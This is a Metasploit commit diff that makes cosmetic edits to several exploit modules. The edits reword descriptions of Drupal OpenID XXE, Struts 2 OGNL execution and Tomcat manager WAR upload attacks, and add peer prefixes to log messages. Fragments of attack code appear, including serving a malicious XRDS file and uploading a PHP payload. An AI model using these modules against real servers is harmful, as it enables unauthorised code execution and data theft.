Land #2941, @todb-r7's release fix-up

bug/bundler_fix 2014020501
William Vu 2014-02-03 13:58:36 -06:00
commit ab4f62c44e
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
5 changed files with 17 additions and 14 deletions

View File

@ -17,10 +17,11 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Drupal OpenID External Entity Injection',
'Description' => %q{
This module abuses a XML External Entity Injection on the OpenID module
from Drupal. The vulnerability exists on the parsing of a malformed XRDS
file coming from a malicious OpenID endpoint. This module has been tested
successfully in Drupal 7.15 and 7.2 with the OpenID module enabled.
This module abuses an XML External Entity Injection
vulnerability on the OpenID module from Drupal. The vulnerability exists
in the parsing of a malformed XRDS file coming from a malicious OpenID
endpoint. This module has been tested successfully on Drupal 7.15 and
7.2 with the OpenID module enabled.
},
'License' => MSF_LICENSE,
'Author' =>
@ -102,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_openid_auth(signature)
unless res
vprint_status("Connection timed out")
vprint_status("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
@ -157,12 +158,12 @@ class Metasploit3 < Msf::Auxiliary
def on_request_uri(cli, request)
if request.uri =~ /#{@prefix}/
vprint_status("Signature found, parsing file...")
vprint_status("#{peer} - Signature found, parsing file...")
@http_loot = parse_loot(request.uri)
return
end
print_status("Sending XRDS...")
print_status("#{peer} - Sending XRDS...")
send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' })
end

View File

@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Developer Mode OGNL Execution',
'Name' => 'Apache Struts 2 Developer Mode OGNL Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache
Struts 2. The problem exists on applications running in developer mode,
where the DebuggingInterceptor allows evaluation and execution of OGNL
expressions, which allows remote attackers to execute arbitrary Java
code. This module has been tested successfully in Struts 2.3.16, Tomcat
code. This module has been tested successfully on Struts 2.3.16, Tomcat
7 and Ubuntu 10.04.
},
'Author' =>

View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
'Name' => 'Apache Tomcat Manager Authenticated Upload Code Execution',
'Description' => %q{
This module can be used to execute a payload on Apache Tomcat servers that
have an exposed "manager" application. The payload is uploaded as a WAR archive
@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw('uri' => path)
unless res and res.code == 200
vprint_error("Failed: Error requesting #{path}")
vprint_error("#{peer} - Failed: Error requesting #{path}")
return nil
end
@ -372,7 +372,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res.code < 200 or res.code >= 300
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
vprint_error("#{peer} - Upload failed on #{upload_path} [#{res.code} #{res.message}]")
return false
end

View File

@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
print_status("#{peer} - Uploading malicious file...")
print_status("#{peer} - Uploading PHP payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'upload.php'),

View File

@ -76,6 +76,8 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
uri = normalize_uri(target_uri.path.to_s, "index.php")
vprint_status("#{peer} - Sending request to #{uri}.")
send_request_cgi({
'method' => 'POST',
'uri' => uri,